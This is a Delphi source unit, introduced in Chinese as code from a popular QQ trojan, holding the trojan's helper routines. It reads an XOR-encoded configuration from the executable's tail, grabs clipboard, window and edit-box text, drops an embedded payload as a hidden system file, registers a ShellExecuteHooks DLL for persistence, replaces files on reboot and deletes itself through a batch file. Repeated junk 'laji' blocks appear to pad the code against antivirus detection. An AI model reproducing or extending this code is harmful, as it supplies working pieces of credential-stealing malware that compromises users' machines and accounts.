tonghan.pas

这是目前很流行的QQ木马 的代码 现在 这个很使用的

    Module32First(ModuleHandle, ModuleStruct);
    getMyFileName := ModuleStruct.szExePath;
end;
// 是否为数字串
function IsNumString(const Str: string): Boolean;
var
  J: Integer;
begin
  Result := True;

  for J := 1 to Length(Str) do
    if (Str[J] < '0') or (Str[J] > '9') then
    begin
      Result := False;
      Exit;
    end;
end;
// 字符串比较(不区分大小写)
function CompareAnsiText(const S1, S2: string): Boolean;
begin
  Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1), -1, PChar(S2), -1) = 2;
end;


//读取自身尾部信息
function GetExtraInfo(FileName: string): string;
var
  hFile, WSize, Len: DWORD;
var
a:string;
b:string;
c:string;
laji:string;
begin
if laji = 'fgggggggrfffffffffgggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  Result := '';

  hFile := CreateFile(PChar(FileName), GENERIC_READ,
    FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  if (hFile = INVALID_HANDLE_VALUE) then Exit;
 if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  SetFilePointer(hFile, -4, nil ,FILE_END);
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  ReadFile(hFile, Len, 4, WSize, nil);
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  Len := Len xor $4D617A69;  // 解出信息长度
  if (Len > GetFileSize(hFile, nil)) then Exit;

  SetFilePointer(hFile, -Len, nil ,FILE_END);
  if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  SetLength(Result, Len);
  if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  ReadFile(hFile, Result[1], Len, WSize, nil);
  if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  CloseHandle(hFile);
end;

//得到剪贴板的内容
function getjianban( hand: LongWord):string;
var
 hGlobal: DWORD;
 pGlobal: PChar;
 hWndDc: HDC;
 Rect: TRect;
 ps: TPaintStruct;
 begin
     Result := '';
        hWndDc := BeginPaint(hand, ps);
        OpenClipboard(hand); // 打开剪贴板
        hGlobal := GetClipboardData(CF_TEXT); // 取得文字信息内存块
        if (hGlobal <> 0) then // 取到
        begin
          pGlobal := GlobalLock(hGlobal); // 锁定
          DrawText(hWndDc, pGlobal, -1, Rect, DT_EXPANDTABS); // 绘制
          GlobalUnlock(hGlobal); // 解锁
        end;
        CloseClipboard(); // 关闭剪贴板
        Result := pGlobal;
end;

//去除空格
function Trim(const S: string): string;
var
  I, L: Integer;
begin
  L := Length(S);
  I := 1;
  while (I <= L) and (S[I] <= ' ') do Inc(I);
  if I > L then Result := '' else
  begin
    while S[L] <= ' ' do Dec(L);
    Result := Copy(S, I, L - I + 1);
  end;
end;
// 取窗体文字
function GetCaption(hWnd: LongWord): string;
var
  szWindowText: array[0..MAX_PATH] of Char;
  szTextLength: Integer;
begin
  szTextLength := SendMessage(hWnd, WM_GETTEXT, MAX_PATH, Integer(@szWindowText[0]));
  szWindowText[szTextLength] := #0;
  Result := szWindowText;
end;

  // 取窗口类名
function GetWinClass(hWnd: LongWord): string;
var
  szClassName: array[0..MAX_PATH] of Char;
begin
  szClassName[GetClassName(hWnd, szClassName, MAX_PATH)] := #0;
  Result := szClassName;
end;




  // 取 edit文字
function GetEditText(hWndEdit: LongWord): string;
var
  szEditText: array[0..MAX_PATH] of Char;
begin
  szEditText[GetWindowText(hWndEdit, szEditText, MAX_PATH)] := #0;
  Result := szEditText;
end;

  // 整数转字符串
function InttoStr(const Int: Integer): string;
var
  d, m: Integer;
begin
  if (Int = 0) then begin Result := '0'; Exit; end;
  if (Int < 0) then m := - Int else m := Int;
  Result := '';
  while (m <> 0) do
  begin
    d := m mod 10;
    m := m div 10;
    Result := Char(d + 48) + Result;
  end;
  if (Int < 0) then Result := '-' + Result;
end;

//字符串转换成整数
Function StrToInt(Const S: String): Integer;
Var
E: Integer;
Begin
Val(S, Result, E);
End;

  // 释资源到文件         『类型』 『名称』 『位置』         『额外信息』
procedure ReleaseResToFile(ResType, ResName, FileName: PChar; const ExtraInfo: string);
var
  HResInfo, HGlobal, FHandle, FSize, WSize: LongWord;
  FMemory: Pointer;
begin
  if (ExtraInfo = '') then Exit;

  HResInfo := FindResource(hInstance, ResName, ResType);
  if (HResInfo = 0) then Exit;

  HGlobal := LoadResource(hInstance, HResInfo);
  if (HGlobal = 0) then Exit;

  FMemory := LockResource(HGlobal);
  if (FMemory = nil) then Exit;

  FHandle := CreateFile(FileName, GENERIC_READ or GENERIC_WRITE,
    0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM, 0);
  if (FHandle = INVALID_HANDLE_VALUE) then Exit;

  FSize := SizeOfResource(hInstance, HResInfo);
  WriteFile(FHandle, FMemory^, FSize, Wsize, nil);

  FSize := Length(ExtraInfo);
  WriteFile(FHandle, ExtraInfo[1], FSize, Wsize, nil);

  SetEndofFile(FHandle);
  CloseHandle(FHandle);

  UnlockResource(HGlobal);
  FreeResource(HGlobal);
end;

  // 释放路径
{function GetReleasePath(): string;
var
  Buffer: array[0..255] of Char;
var
a:string;
b:string;
c:string;
laji:string;

begin
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  if (GetSystemDirectory(Buffer, 255) = 0) then Buffer[0] := 'C';
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  if (IsCharAlpha(Buffer[0]) = False) then Buffer[0] := 'C';
if laji = 'fggggggggggggg' then
begin
a:= '1111111111111111111';
b:= '2222222222222222222';
c:= '3333333333333333333';
end else
begin
a:= 'aaaaaaaaaaaaaaaaaaaa';
b:='bbbbbbbbbbbbbbbbbbbbb';
c:= 'cccccccccccccccccccc';
end;
  Result := Buffer[0] + ':\Program Files\Common Files\Microsoft Shared\MSINFO\';
end;
      }

  // 添加注册表项    『根键』       『路径』 『名称』 『键值』
procedure SetStrValue(RootKey: HKEY; StrPath, StrName, StrData: PChar);
var
  TempKey: HKey;
  Disposition, DataSize: LongWord;
begin
  TempKey := 0;
  Disposition := REG_CREATED_NEW_KEY;
  RegCreateKeyEx(RootKey, StrPath, 0, nil, 0, KEY_ALL_ACCESS, nil, TempKey, @Disposition);

  DataSize := lstrlen(StrData) + 1;
  RegSetValueEx(TempKey, StrName, 0, REG_SZ, StrData, DataSize);

  RegCloseKey(TempKey);
end;

  // 添加Url执行挂钩     『钩子文件名』
procedure RegisterDll(ComFileName: PChar);
const
  HookPath = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks';
  HookName = '{91B1E846-2BEF-4345-8848-7699C7C9935F}';
var
  sTemp: string;
begin
  SetStrValue(HKEY_LOCAL_MACHINE, HookPath, HookName, '');

  sTemp := 'CLSID\' + HookName;
  SetStrValue(HKEY_CLASSES_ROOT, PChar(sTemp), '', '');

  sTemp := sTemp + '\InProcServer32';
  SetStrValue(HKEY_CLASSES_ROOT, PChar(sTemp), '', ComFileName);
  SetStrValue(HKEY_CLASSES_ROOT, PChar(sTemp), 'ThreadingModel', 'Apartment');
end;

  // 处于9x操作系统
function IsWindows9x(): Boolean;
var
  Osi: TOSVersionInfo;
begin
  Osi.dwOSVersionInfoSize := SizeOf(Osi);
  GetVersionEx(Osi);
  Result := Osi.dwPlatformID <> Ver_Platform_Win32_NT;
end;



  // 文件改名(重启后)
procedure ForceMoveFile(const Target, Source: string);
var
  Target_Buffer: array[0..MAX_PATH] of Char;
  Source_Buffer: array[0..MAX_PATH] of Char;
begin
  if IsWindows9x() then
  begin
    GetShortPathName(PChar(Target), Target_Buffer, MAX_PATH);
    GetShortPathName(PChar(Source), Source_Buffer, MAX_PATH);
    WritePrivateProfileString('rename', Target_Buffer, Source_Buffer, 'wininit.ini');
  end else
  begin
    MoveFileEx(PChar(Source), PChar(Target), MOVEFILE_DELAY_UNTIL_REBOOT or MOVEFILE_REPLACE_EXISTING);
  end;
end;

  // 提取路径
function ExtractFilePath(const FullName: string): string;
var
  P: Integer;
begin
  P := Length(FullName);
  while (P > 0) and (FullName[P] <> '\') and (FullName[P] <> ':') do Dec(P);
  Result := Copy(FullName, 1, P);
end;

  // 删除自身
procedure DeleteMe();
var
  BatchFile: TextFile;
  BatchFileName: string;
begin
  BatchFileName := ExtractFilePath(ParamStr(0)) + '_xr.bat';
  AssignFile(BatchFile, BatchFileName);
  Rewrite(BatchFile);

  Writeln(BatchFile, ':try');
  Writeln(BatchFile, 'del "' + ParamStr(0) + '"');
  Writeln(BatchFile, 'if exist "' + ParamStr(0) + '"' + ' goto try');
  Writeln(BatchFile, 'del %0');
  CloseFile(BatchFile);

  ShellExecute(0, 'open', PChar(BatchFileName), nil, nil, SW_HIDE);
end;
 //得到当天时间并以数字型式显示
function getNowDay:string;
var
 st: TSystemTime;
begin
 GetLocalTime(st);
 result:=inttostr(st.wYear*365+st.wMonth*30+st.wday);
end;
//写记事本
 procedure Log1( s : PChar);stdcall;
  var
    F : TextFile;
  begin
    assignfile(f,'c:\记事本.txt');
    if fileexists('c:\记事本.txt') then append(f)
    else rewrite(f);
    writeln(f,s);
    closefile(f);
  end;
end.